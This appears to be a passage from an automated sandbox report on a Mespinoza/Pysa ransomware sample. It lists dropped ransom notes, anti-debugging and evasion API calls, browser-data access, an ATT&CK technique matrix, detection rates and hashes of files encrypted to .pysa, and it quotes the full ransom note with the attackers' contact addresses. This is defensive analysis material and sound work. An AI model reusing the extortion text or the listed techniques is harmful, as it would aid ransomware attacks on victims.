                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\System Tools\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Administrative Tools\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\AutoItX\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\Default\Start Menu\Programs\Accessibility\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\Default\Start Menu\Programs\Accessories\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\Default\Start Menu\Programs\Maintenance\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\Default\Start Menu\Programs\System Tools\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\Default\Start Menu\Programs\Windows PowerShell\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\Default\Start Menu\Programs\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\Default\Start Menu\Readme.READMEJump to behavior

                  Hooking and other Techniques for Hiding and Protection:

                  Creates files in the recycle bin to hide itself
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exe File created: C:\$Recycle.Bin\S-1-5-18\Readme.README
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013F1C5F GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_013F1C5F
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exe Code function: 0_2_013C9500 wsprintfW,FindFirstFileW,wsprintfW,_wcsstr,_wcsstr,FindNextFileW,FindClose,_wcsstr,0_2_013C9500
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exe Code function: 0_2_0140C916 FindFirstFileExA,0_2_0140C916
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exe Code function: 0_2_013C8F21 __EH_prolog3_GS,GetLogicalDriveStringsW,GetDriveTypeW,0_2_013C8F21
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exe Code function: 0_2_013F34AB IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_013F34AB
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exe Code function: 0_2_014034C6 mov eax, dword ptr fs:[00000030h] 0_2_014034C6
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exe Code function: 0_2_013CA164 __EH_prolog3_GS,GetProcessHeap,HeapAlloc,CreateThread,WaitForMultipleObjects,CloseHandle,GetProcessHeap,HeapFree,ExitProcess,0_2_013CA164
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exe Code function: 0_2_013F360A SetUnhandledExceptionFilter,0_2_013F360A
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exe Code function: 0_2_013F34AB IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_013F34AB
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exe Code function: 0_2_013F36BB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_013F36BB
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exe Code function: 0_2_013FD897 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_013FD897
                  Source: 6hFKK8UQi7.exe, 00000000.00000002.471504583.0000000001450000.00000002.00000001.sdmp Binary or memory string: Program Manager
                  Source: 6hFKK8UQi7.exe, 00000000.00000002.471504583.0000000001450000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
                  Source: 6hFKK8UQi7.exe, 00000000.00000002.471504583.0000000001450000.00000002.00000001.sdmp Binary or memory string: Progman
                  Source: 6hFKK8UQi7.exe, 00000000.00000002.471504583.0000000001450000.00000002.00000001.sdmp Binary or memory string: Progmanlock
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exe Code function: 0_2_013F2F43 cpuid 0_2_013F2F43
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exe Code function: EnumSystemLocalesW,0_2_01406B96
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exe Code function: GetLocaleInfoW,0_2_01406FCE
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0140F4B3
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exe Code function: EnumSystemLocalesW,0_2_0140F776
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exe Code function: EnumSystemLocalesW,0_2_0140F72B
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exe Code function: GetLocaleInfoW,0_2_0140F682
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exe Code function: EnumSystemLocalesW,0_2_0140F811
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0140F89E
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exe Code function: GetLocaleInfoW,0_2_0140FAEE
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exe Code function: GetLocaleInfoW,0_2_0140FD1E
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0140FDEB
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0140FC17
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exe Code function: 0_2_01407038 GetSystemTimeAsFileTime,0_2_01407038
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information:

                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.dbJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db.pysaJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\previews_opt_out.db.pysaJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\previews_opt_out.dbJump to behavior

                  Mitre Att&ck Matrix

                  | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
                  |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
                  | Valid Accounts | Windows Management Instrumentation | Browser Extensions 1 | Process Injection 2 | Process Injection 2 | OS Credential Dumping 1 | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact 1 |
                  | Default Accounts | Scheduled Task/Job | Registry Run Keys / Startup Folder 1 | Registry Run Keys / Startup Folder 1 | Deobfuscate/Decode Files or Information 1 | LSASS Memory | Security Software Discovery 2 | Remote Desktop Protocol | Man in the Browser 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
                  | Domain Accounts | At (Linux) | Application Shimming 1 | Application Shimming 1 | Hidden Files and Directories 1 | Security Account Manager | Process Discovery 1 | SMB/Windows Admin Shares | Data from Local System 1 | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
                  | Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 2 | NTDS | File and Directory Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud |
                  | Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | System Information Discovery 23 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  | Source | Detection | Scanner | Label |
                  |---|---|---|---|
                  | 6hFKK8UQi7.exe | 52% | Virustotal | |
                  | 6hFKK8UQi7.exe | 69% | ReversingLabs | Win32.Ransomware.Mespinoza |
                  | 6hFKK8UQi7.exe | 100% | Avira | TR/FileCoder.nxnua |

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  No Antivirus matches

                  Domains and IPs

                  Contacted Domains

                  No contacted domains info

                  Contacted IPs

                  No contacted IP infos

                  General Information

                  Joe Sandbox Version:31.0.0 Red Diamond
                  Analysis ID:322355
                  Start date:25.11.2020
                  Start time:01:54:11
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 8m 55s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Sample file name:6hFKK8UQi7.bin (renamed file extension from bin to exe)
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:22
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal80.rans.spyw.evad.winEXE@3/1025@0/0
                  EGA Information:Failed
                  HDC Information:
                  • Successful, ratio: 12.4% (good quality ratio 11.9%)
                  • Quality average: 74.9%
                  • Quality standard deviation: 23.5%
                  HCA Information:Failed
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  Warnings:
                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                  • Report size getting too big, too many NtCreateFile calls found.
                  • Report size getting too big, too many NtOpenFile calls found.
                  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                  • Report size getting too big, too many NtReadFile calls found.
                  • Report size getting too big, too many NtSetInformationFile calls found.
                  • Report size getting too big, too many NtWriteFile calls found.

                  Simulations

                  Behavior and APIs

                  | Time | Type | Description |
                  |---|---|---|
                  | 01:56:02 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Readme.README |
                  | 01:56:11 | API Interceptor | 1x Sleep call for process: OpenWith.exe modified |

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASN

                  No context

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\$Recycle.Bin\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Reputation:low
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\$Recycle.Bin\S-1-5-18\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:true
                  Reputation:low
                  C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Reputation:low
                  C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Reputation:low
                  C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Reputation:low
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.995147776995582
                  Encrypted:true
                  SSDEEP:3072:0PqHji+ffAIpUqnFtGyVme2p0oXQ/ei2c:SifAEUqn3Gome2pBji2c
                  MD5:109043C12A0800ACDC8702F430C4B5FF
                  SHA1:5590612E50A7400ED893F87272BAE884E640A6CA
                  SHA-256:AF7E54F50981ADC662489D2C1DF3FABE7DCCDBB529E03BD58202A7A3B6A6172B
                  SHA-512:14A561DAD254908988AE180D8000D47E1BF393E9E40EDD8956CFAEF1CA9D83B113F75BEB5C0938719CEB516F89912AE6498BBC45AF7FF2447A1F18F9C43C064D
                  Malicious:true
                  Reputation:low
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Click on 'Change' to select default PDF handler.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.993869313730207
                  Encrypted:true
                  SSDEEP:3072:x46Bg3CH3bkYq2OMslYxpUPenCkHatOAnBX/MUEwio:x46Bg3CNtOMslY0Gnd6tDZ/MUEwz
                  MD5:6E8F9B490C13DE739C903A4EA088C3F1
                  SHA1:D875EC6C24872609713CE1E38F0D42A2AA516B37
                  SHA-256:8BB8607189516FEDBB0B1C164EB80FBC3A7979EDE84E8C2A7C616CD7E3088F02
                  SHA-512:AB28ACAAC61298411CB500414A34E90AA7F5944A636EB5B84F40F648EA4CC26D797B59D02E8B4D8ECB7D3CEAF7D64A7C4C7BF37E87E12FE61E6A2DAF1CBBED66
                  Malicious:true
                  Reputation:low
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\AdobeID.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):83968
                  Entropy (8bit):7.991828427246029
                  Encrypted:true
                  SSDEEP:1536:yHHdEBdMrlcfcxSFIsCZr/VWri0lMwHyfC2iOsWQIU7AEgkYarKlUx+4:gaPMxchFWgsq2ib7IUcEoQNxz
                  MD5:412FB73909AB6BBFFC3CEDCA1C47D9CC
                  SHA1:B9820E4916F73ADA36FEE9B69AC121D8404A9A17
                  SHA-256:DBBA610BCFE6ACF48891FC8B78F9661C71FA696C268DF8572AF2B4AC8CF53550
                  SHA-512:FDB457359D21AB80DDCF2387F3855E5700075960E3B11F7F6C6D2B81FE3D66FCEE9996CBF2575AC2C630EEB1FD52209F4D3B1D0E08AFD87B27C9A0A7BDDB4E8E
                  Malicious:true
                  Reputation:low
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\DefaultID.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):81920
                  Entropy (8bit):7.991280526421198
                  Encrypted:true
                  SSDEEP:1536:rAS/Mgaxs+vw8QjHFcT9BCSan70M5+BwmbgWBvYlogJHkFXz:rn/ba2F0xaYO1mbFBwlFkFD
                  MD5:4EE5E7D8CFE49AFE87539D079E796764
                  SHA1:F3DC4C4A1077EB7A405548A9898CA16E44CB3187
                  SHA-256:40337FE5219DD1A382D904C693AC061872C16CDBD6DA588072B052837CCCE797
                  SHA-512:590FE84B0BD5404073821E2DB3ABC53E16A8CFA01B638E1E1C5352E198FD0974663E1A0A7A860ABF16807D9AF37D8E77EC2A6B42A7708770A06F9CBFBC28ADEE
                  Malicious:true
                  Reputation:low
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\PDFSigQFormalRep.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):411648
                  Entropy (8bit):7.999439540415626
                  Encrypted:true
                  SSDEEP:12288:oFmkDwnqN5HSEEBBdQv7H9WljZCzbP582bY:ocPnqnHTEKv798Ezby2s
                  MD5:0D0C35BE43B7D86481F7E68B440E90A8
                  SHA1:FAE44C9FFF20D5E1EDEAAF6B39FA973F84F94282
                  SHA-256:0E3E6E1E10CB1C35193ACBE11E0CF893289A3067682F2A2416A383C9F1037E19
                  SHA-512:F8446F9DC4F741A6002469555CF1AAC53028ECCF4BE6453C55225626C5E6C661BBC8767069232FE024DC399BE4043052B28459DA240C921E3C15B0D99E81FA54
                  Malicious:true
                  Reputation:low
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Dark.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.7772790736660715
                  Encrypted:false
                  SSDEEP:96:jSlBjkZPGUHV/1MVM8TldyTa/tkMyvDSi4kfZIaDGni0Nsm8spULP:jSHkdzV/1UM8TlYmtnoSD2GN58QO
                  MD5:2BF4D821A13CB7FDAF35F2FFF0284CEB
                  SHA1:530737B6805BE0805BDD8A50025A3D1698D1E04F
                  SHA-256:263E22AFB99BA79201AB390C7EEC9F7BA875D9C700DEAD3A3406A22E030D477F
                  SHA-512:09CB7D243EBE024F07E7E04C606F998B1898DED534F0521ADE9F854EE9B814F731209388F3A0EF5A0CDD2543D80FE4E1A36A574E313A26ED18177ACF23B18287
                  Malicious:false
                  Reputation:low
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Light.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.786342845438114
                  Encrypted:false
                  SSDEEP:96:tXImB0UMRx0jUT0WgctLiDr1DlFjEHM/CZow:r0l6UT0hct4rdlZEHeCyw
                  MD5:C6B5A20491C5EC5F7634A80BFCFDF616
                  SHA1:2E528CA171C3B6F9A7734152156174EED0DE18CA
                  SHA-256:A0EB60E30D1A6B5BD52DEBE9444D1344998169FE718BD4DE6D75BA83C045D7E8
                  SHA-512:671DED77C81B12DD2EC06E8F3441E494FB2AB49ED500697D929989D802AB009F5182E9A19FD32B4D976C09AD2DB32D64CB5E0CD6CA0B7D4EB6AE539642E3A504
                  Malicious:false
                  Reputation:low
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Dark.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):309248
                  Entropy (8bit):7.999029009772014
                  Encrypted:true
                  SSDEEP:6144:xqjyV3+51fUOl6aym8fYRvvl75bAFaJQGwAYcUQdMt6/P3GyIM5JZO4kgRQ:o7LMOl6aym8QRvvPbmncULc3GnEHBu
                  MD5:5BE853376088D2DFCE29C69B56288B45
                  SHA1:DAC753C90524B95261B23167EF506E028AF60FC4
                  SHA-256:084D315A0A07E1F37318E1B768B70749F22A5137C9EC6039E89FA84E08446298
                  SHA-512:433BBF21339F377D29658897A6F911D565A706F906280B5500ED5E551A647FB62F2A4296BDC610F56126434D975DF3E48C0C86A309B8F369E6DAAE53A3AE4120
                  Malicious:true
                  Reputation:low
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Light.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):309248
                  Entropy (8bit):7.998942222461106
                  Encrypted:true
                  SSDEEP:6144:ZCN8OxBluZug6EJc5v1tkZishLhbH3YuG64PNE1wvIbnK:ZCNxGL+l1tGis/bopdPNTAO
                  MD5:6D5C63BAC17DED29387D902121A9F80B
                  SHA1:F2E30B6A8ED19F325606A192686EF354E483372C
                  SHA-256:114D7E3EFAD13375B989303544797D9BBF3E02AB58F4D9E37722FDA6D3C5B07B
                  SHA-512:2D26CDE44869FA032F8AE1941A28D113876A003675C11CC90090A2B1D416973CC751AB35F309128E2874D9D84244AC15169178BF0AB6AC3EF9A7F4F950736532
                  Malicious:true
                  Reputation:low
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Dark.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):57344
                  Entropy (8bit):7.98435216821147
                  Encrypted:false
                  SSDEEP:1536:w+1+i1iTuw0R5Uu5VtBHrjIz2LdI/H6yNB+d0yitt8O4W/i76:w+1+DTkR5t3BoaOayz+6yo8vW7
                  MD5:B3AB72D61418223F05DC7916E0E92E56
                  SHA1:293C00AD64255C9F923186BB974301FB813D861F
                  SHA-256:937F935CDFFFF0E06A01B93DDFE556AC4B26EE69F688C3DBCDDC7E7AB2C3E737
                  SHA-512:F184EF71B07C126939497E03F87EA908BECE73CD0C605F4E363AD7D92890A36C8ACD339FD2EAC4B9B2F2C7EA440B6427BB0ABE45DD5D23C462895D8181D4804A
                  Malicious:false
                  Reputation:low
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Light.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):57344
                  Entropy (8bit):7.984116643493958
                  Encrypted:false
                  SSDEEP:768:FLVFEWfYaJYtW6itlNNmgcKSxeZwyZpOQ/zhFjLEqku+dmXNzRgiM4iOs7JEh:pVFEWQautWh2gcuBOSroa+sNzCi4Oqc
                  MD5:84D115EBB32FAF1DF14E3F73530F78EB
                  SHA1:CDF688FB5936BBACFCD95BDF0C7D00B4C464A750
                  SHA-256:7F847C23B533BF51C93C7A4A195EFDDCEE1D0128A701D79088460A173E56298F
                  SHA-512:8FF059B6B02A529D288FB1E0759C82819191DAFAB1F89979712ECB439EB8A120D0CC0B7F8FDB36FFE0B3BDC52B76461D974E241773F89C6F9D87EACD71EE8690
                  Malicious:false
                  Reputation:low
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Acrobat Pro DC.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.994211569460936
                  Encrypted:true
                  SSDEEP:3072:+grOyr/Ue3VpdhnPlibxNYUaORcAYaFKOBNlzXHaa:XyPQdhPlkxNYU3vYIPlbH1
                  MD5:A1A9B50821DAE51D00DCED4F64F769F5
                  SHA1:82D59D4307C1792826A98C18FEFBAF8D7B99AF61
                  SHA-256:CB4E70406FFC35C59AF8F89EC6A08EE4D058D7AD06AAF1326F1B3C3EE0ABBCE8
                  SHA-512:9B938A0A48C9D6AA19F8A026A72BD4396BF04A6C7E252955A8CD0DF6C0EFC29B4E7CF9E0178E1F5E132217600B32340FC90EF929B7DA276D33F73C2EF2E4DDE1
                  Malicious:true
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Cloud Services.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):309248
                  Entropy (8bit):7.9988654945972515
                  Encrypted:true
